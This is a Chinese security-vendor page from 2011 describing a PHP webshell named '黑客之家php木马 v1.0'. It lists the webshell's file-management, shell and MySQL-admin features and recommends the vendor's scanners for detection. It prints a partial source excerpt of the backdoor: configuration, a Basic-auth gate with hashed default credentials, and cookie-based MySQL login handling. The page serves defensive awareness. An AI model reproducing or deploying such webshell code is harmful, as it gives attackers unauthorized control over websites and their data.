黑客之家php木马 v1.0

2011-12-14 15:23:45 来源:本站原创,请勿转载 浏览:139
黑客之家php木马 v1.0

木马名称:黑客之家php木马 v1.0
木马格式:php
默认密码:
木马作用:文件管理(浏览,打包,解压等),phpshell工具,调色盘,php探针,密码/编码,mysql数据库管理。

运行界面如下:(图片若超出屏幕,请右键另存到本地查看)

总结:界面色彩缤纷,估计是女黑客喜欢的木马之一,功能不算太强大,中规中矩,不过光文件管理一项功能,就可以任意操作网站文件了,危险!
防御方法:护卫神入侵防护系统、护卫神云查杀均可查杀 黑客之家php木马 v1.0 这个php网页木马。

黑客之家php木马 v1.0部分代码

header('content-Type:text/html;charset=gb2312');
$page_time_limit=600;//设定脚本运行时间,用于ZIP压缩及批理文件处理:)
$wlczip_max=200;     //wlc方式打包最大多少Mb
$show_owner=1;       //是否显示所有者
$show_menu=1;        //是否显示右键操作菜单
$upload_max=25;   //一次最大文件上传个数
$pagestartime=microtime();//页面运行时间
@set_time_limit($page_time_limit);
//修改这部分为你自己的管理员身份验证方式
  if(getenv(HTTP_CLIENT_IP))  {$REMOTE_ADDR = getenv(HTTP_CLIENT_IP);}
  elseif(getenv(HTTP_X_FORWARDED_FOR)) {$REMOTE_ADDR = getenv(HTTP_X_FORWARDED_FOR);}
  else {$REMOTE_ADDR = getenv('REMOTE_ADDR');}
  if($REMOTE_ADDR!=''&&$REMOTE_ADDR!='')//允许直接访问的IP
     { if(!isset($PHP_AUTH_USER))
 { Header('WWW-Authenticate:Basic realm=\'$REMOTE_ADDR 管理员登陆\'');
   Header('HTTP/1.0 401 Unauthorized');
   echo '对不起,您没有权限\n';
   exit();}
 else{ if((md5($PHP_AUTH_USER)!='21232f297a57a5a743894a0e4a801fc3') || (md5($PHP_AUTH_PW)!='e10adc3949ba59abbe56e057f20f883e'))
  { Header('WWW-Authenticate:Basic realm=\'用户名或者密码错误\'');
   Header('HTTP/1.0 401 Unauthorized');
   exit();}
 }
}
//管理员身份验证,下面为管理员看到的内容

/////////////////////////////////////////////////////////////////////////////////////////////////////
if( $tools == 'mysql' && $action == 'logon_submit' )
{
setcookie('mysql_web_admin_zoom', $zoom );
setcookie('mysql_web_admin_username', $username );
setcookie('mysql_web_admin_password', $password );
echo '';
echo '等待显示数据。。。。';
}
elseif($tools == 'mysql') {
while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
if( $var == 'mysql_web_admin_zoom' ) $zoom = $value;
if( $var == 'mysql_web_admin_username' ) $USERNAME = $value;
if( $var == 'mysql_web_admin_password' ) $PASSWORD = $value;
}
}
if( $tools == 'mysql' && $action == 'logout' )
{
setcookie('mysql_web_admin_zoom', 'NULL' );
setcookie('mysql_web_admin_username', 'NULL' );
setcookie('mysql_web_admin_password', 'NULL' );
}

(0)
(0)